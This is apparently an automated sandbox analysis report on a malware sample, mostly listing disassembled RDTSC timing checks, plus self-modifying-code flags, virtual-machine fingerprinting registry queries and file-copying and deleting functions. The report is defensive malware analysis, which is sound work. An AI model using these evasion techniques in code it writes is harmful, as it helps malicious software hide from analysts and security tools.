                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB80E6 second address: DB80FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push edi 0x00000008 push eax 0x00000009 jl 00007FD2D075E616h 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6A94 second address: DB6AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007FD2D0D7C266h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6AA0 second address: DB6AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6AA4 second address: DB6AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD2D0D7C266h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FD2D0D7C26Ch 0x00000016 jnp 00007FD2D0D7C266h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6AC0 second address: DB6AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD2D075E616h 0x0000000a jns 00007FD2D075E616h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6D68 second address: DB6D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007FD2D0D7C266h 0x0000000c jng 00007FD2D0D7C266h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6D7A second address: DB6DAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D075E627h 0x00000007 jmp 00007FD2D075E621h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB714F second address: DB7155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7155 second address: DB7166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 jnl 00007FD2D075E616h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7273 second address: DB72AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnp 00007FD2D0D7C26Ch 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FD2D0D7C26Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD2D0D7C279h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB72AE second address: DB72B8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD2D075E616h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB72B8 second address: DB72BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB72BE second address: DB72F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D075E629h 0x00000007 pushad 0x00000008 jmp 00007FD2D075E627h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7DB7 second address: DB7DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7DBD second address: DB7DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7DC1 second address: DB7DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7DCA second address: DB7DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D075E61Dh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FD2D075E621h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7DEF second address: DB7DF4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7DF4 second address: DB7E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7E02 second address: DB7E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FD2D0D7C277h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7E1E second address: DB7E24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7E24 second address: DB7E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7E2A second address: DB7E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF008 second address: DBF027 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0D7C274h 0x00000007 pushad 0x00000008 js 00007FD2D0D7C266h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBD110 second address: DBD12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD2D075E625h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBD3B8 second address: DBD3BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBD3BD second address: DBD3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D04F5C1Dh 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d js 00007FD2D04F5C16h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD2D04F5C28h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBD3F5 second address: DBD3FC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE49B second address: DBE4A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE722 second address: DBE728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC87D3 second address: DC8820 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD2D04F5C2Ah 0x00000008 jmp 00007FD2D04F5C22h 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007FD2D04F5C1Eh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jmp 00007FD2D04F5C29h 0x0000001d push ecx 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8F79 second address: DC8F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8F7F second address: DC8F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8F85 second address: DC8F89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD027D second address: DD0287 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD2D04F5C16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0DB0 second address: DD0DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 js 00007FD2D1555D26h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0DBC second address: DD0DC6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD2D04F5C16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0DC6 second address: DD0DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD2D1555D30h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF4C8 second address: DCF4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF4CE second address: DCF4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D1555D39h 0x00000009 popad 0x0000000a jns 00007FD2D1555D2Ch 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8A08 second address: DD8A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007FD2D04F5C2Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD2D04F5C29h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8BA1 second address: DD8BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD2D1555D26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8BAB second address: DD8BB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8BB4 second address: DD8BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 ja 00007FD2D1555D26h 0x0000000c jg 00007FD2D1555D26h 0x00000012 pop edi 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8BCD second address: DD8BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEC158 second address: DEC15C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEC15C second address: DEC162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEC162 second address: DEC176 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD2D1555D28h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBF9E second address: DEBFB0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD2D04F5C18h 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FD2D04F5C16h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBFB0 second address: DEBFBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBFBD second address: DEBFC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBFC3 second address: DEBFD6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD2D1555D26h 0x00000008 js 00007FD2D1555D26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3E73 second address: DF3E78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E01151 second address: E0117A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD2D1555D32h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD2D1555D2Eh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0147C second address: E01486 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD2D04F5C16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E01486 second address: E01490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E01490 second address: E014A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D04F5C1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E015EF second address: E015F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0178B second address: E017BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FD2D04F5C26h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jno 00007FD2D04F5C18h 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007FD2D04F5C16h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E017BA second address: E017BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0190B second address: E01911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02641 second address: E0264C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD2D1555D26h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0537D second address: E05382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E05382 second address: E053A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007FD2D1555D26h 0x0000000e jmp 00007FD2D1555D2Ch 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E2FB second address: E0E31E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D04F5C29h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FD2D04F5C16h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E31E second address: E0E322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F0D3 second address: E1F111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007FD2D04F5C16h 0x0000000c popad 0x0000000d jmp 00007FD2D04F5C25h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FD2D04F5C26h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F111 second address: E1F11C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E330F8 second address: E3311C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD2D04F5C16h 0x0000000a popad 0x0000000b jmp 00007FD2D04F5C29h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E332A3 second address: E332C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007FD2D1555D34h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E332C0 second address: E332C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E33422 second address: E33432 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD2D1555D2Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3357C second address: E33580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E33580 second address: E33588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3393C second address: E33942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E33942 second address: E33948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E33A85 second address: E33A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E35843 second address: E3584F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD2D1555D26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3584F second address: E3586C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD2D04F5C28h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E380CF second address: E380D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD2D1555D26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E383F6 second address: E383FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E383FC second address: E38400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E38400 second address: E3840D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3840D second address: E38415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E39ECE second address: E39ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E39ED4 second address: E39EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD2D1555D2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB02BC second address: 4CB0320 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD2D04F5C1Bh 0x00000009 add si, 929Eh 0x0000000e jmp 00007FD2D04F5C29h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FD2D04F5C1Eh 0x0000001d push eax 0x0000001e jmp 00007FD2D04F5C1Bh 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FD2D04F5C25h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0320 second address: 4CB0330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D1555D2Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB03F5 second address: 4CB03FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 7EB6B6B4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BB179D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BB1870 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D7D000 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DDA350 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009638B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00964910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00964910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0095DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0095E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0095ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00964570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00964570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0095F6B0
